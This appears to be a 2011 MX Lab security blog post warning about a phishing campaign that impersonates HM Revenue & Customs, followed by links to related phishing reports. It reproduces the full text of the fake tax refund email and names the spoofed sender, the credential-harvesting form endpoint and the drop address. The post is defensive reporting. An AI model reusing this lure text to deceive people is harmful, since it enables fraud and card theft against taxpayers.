MX Lab, http://www.mxlab.eu, is intercepting tax refund phishing emails with the subject “Please Submit Your Payment Refund″ and an attached HTML webpage. We have reported this earlier on on January 27th, 2011, and this campaign is still running in a modified version.
The emails is send from the spoofed email address srvcs@hmrc.gov.uk, and possible other combinations, and has the following body:
Dear Applicant:
Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the last seven years our calculations show that you have made over payments of GBP 178.25
Due to the high volume of refunds due you must complete the online application, the telephone help line is unable to assist with this application. In oder to process your refund you will need to complete the application form attached to this email.Your refund may take up to 6 weeks to process please make sure you complete the form correctly.
NOTE: If you’ve received an Income Tax ‘repayment’ it will either be following a claim you’ve made or because HM Revenue & Customs (HMRC) has received new information about your taxable income or entitlement to allowances. The refund may come through your tax code or as a payment and could relate to the current tax year or earlier years.
An Income Tax repayment is a refund of tax that you’ve overpaid. So, if you’ve paid too much tax for example through your job or pension this year or in previous years HMRC will send you a repayment. You’ll get the repayment by bank transfer directly to your credit or debit card.
————————————————————–
Copyright 2011, HM Revenue Customs UK All rights reserved.
Attached to the email is an HTML page with the name Refund_Form.htm. Once opened you will have a webform to submit your personal details together with your credit card details.
When looking into the HTML source code we can find that the layout and images are directly taken from the http://www.hmrc.gov.uk/ web site. The form data itself will be directed to hxxp://www.hotel-bergara.com/cgi-bin/mailform.cgi. When submitting data you will be redirected to the HM Revenue & Customs web site. The forms hidden values shows us that the data is sent to govukgov@yahoo.com.
We also have a second example where the email contains an URL to the phishing web site instead of an embedded attachment in the message.
Related Posts
- HM Revenue & Customs phishing emails
MX Lab, http://www.mxlab.eu, is intercepting tax refund phishing emails with the subject “FORM SAT-19287″ and an attached HTML webpage.
The emails is send from the spoofed email address x... - Freebox phishing emails
MX Lab, http://www.mxlab.eu, started to intercept a new trojan distribution campaign by email with the subject “Facture N: 01-249576284 !”, note that the invoice number changes with each e... - A wave of PayPal phishing emails
Over 200 million people have accounts on PayPal, making it a key target for internet fraudsters attempting to steal money.
One of the way that criminals try to get their hands on your cash is by phish... - Emails with the URL anoniemberichtje.com is a phishing attempt and you will get a expensive SMS subscription
MX Lab intercepted some emails with the subject “Lees ffkes mn bericht” – can be translated to “read my message”.
This message is written in the Dutch language – so... - Adobe Flash malware in what appears as phishing emails
MX Lab intercepted some emails that appear to be genuine phishing emails but when investigating the included URLs further, they are in fact an attempt to install malware on a computer in the form of a... - 3.7 billion phishing emails were sent in the last 12 months
Cybercriminals sent 3.7 billion phishing emails over the last year, in a bid to steal money from unsuspecting web users, says CPP.
View full post on Network World on Security... - HM Revenue & Customs Refund Portal – Ten Phish in One
This morning I was reading a report from Kenneth Paschal, a member of the UAB Phishing Operations research team, that contained an interesting group of new phishing sites. The campaign advertises an ... - Cyber Crooks All Set to Crash the British Royal Wedding
As we have seen with many major events in the past, news of the British Royal Wedding is currently being used by cyber criminals to bolster their spam campaigns and push rogue antivirus software throu... - New spamvertized campaign theme
The wave of United Parcel Service, DHL Global and Post Express Office spam - which has been so prolific and leading to scareware infections - changed to Bobijou Inc. over the Easter weekend.Howe... - More fake Twitter emails
It’s been over a month since we wrote about fake Twitter email messages, and if it worked once for scammers, they’ll certainly try it again. Commtouch labs is seeing large quantities of &#...
Posted on 01 April 2011. Tags: Continued, Customs, emails, Phishing, Revenue
The above information is reprinted from and copyrighted © by MX Lab.
